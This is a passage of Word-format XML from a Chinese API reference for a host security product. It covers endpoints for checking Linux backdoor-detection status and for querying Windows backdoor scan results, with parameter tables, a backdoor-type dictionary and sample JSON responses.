    <w:p w14:paraId="1BF42E69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A527B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F192D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A0EA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363100D9"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1339743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0FA590E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3727DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3200D81F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="656FF5E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73C02742" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2B240A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78125BDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735B0B05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C2A1A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20DD6680" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DAEF388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC17941" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38558C14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44EBB076" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>2:running</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3:success 4: failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B208DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc115166231"/>
      <w:bookmarkStart w:id="318" w:name="windows后门检测"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="316"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows后门检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w14:paraId="110A708F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="_Toc115166232"/>
      <w:bookmarkStart w:id="320" w:name="查询结果-6"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="588CDDDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Windows后门检测扫描结果的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F283ECE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE1E4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70DD7C63"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863"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3152"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F032E8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BF9CAF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EB4576" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D4857A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58116958" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77C74316" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281C0D64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573A78D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="793A9CD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589F7137" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20798588" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3265A9B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012C9BBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="275F555D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5A9101" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E2B5022" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71046A0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5164E998" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27625A4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="032E9C35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="762B2896" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EADE8A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C2C694" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B48DDED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4576B5D9" w14:textId="01CFBBCC" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>后门类型，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "windows后门类型" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>Windows后门类型</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A8E6B33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C0EBC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34219FFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0903620A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61D4C4CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>问题摘要</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04B35A00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>Windows后门类型字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="676"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="56AF654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F9056A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F58A49A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2463BF7A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21CE7ED6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E4AA3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2309CA2F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B57294" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F967A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27FF872B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="499E2B1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E8E0A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71D07D58" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F132F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103C3BD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75298655" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66659BCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63169A47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>可疑启动</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="010EC714" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55136456" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63FD2203" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>映像劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12ECE0BD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF7F2A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7924C6D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>恶意进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24767E91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E23439" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA6DB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FB477" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "b6f30c43688e4798",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
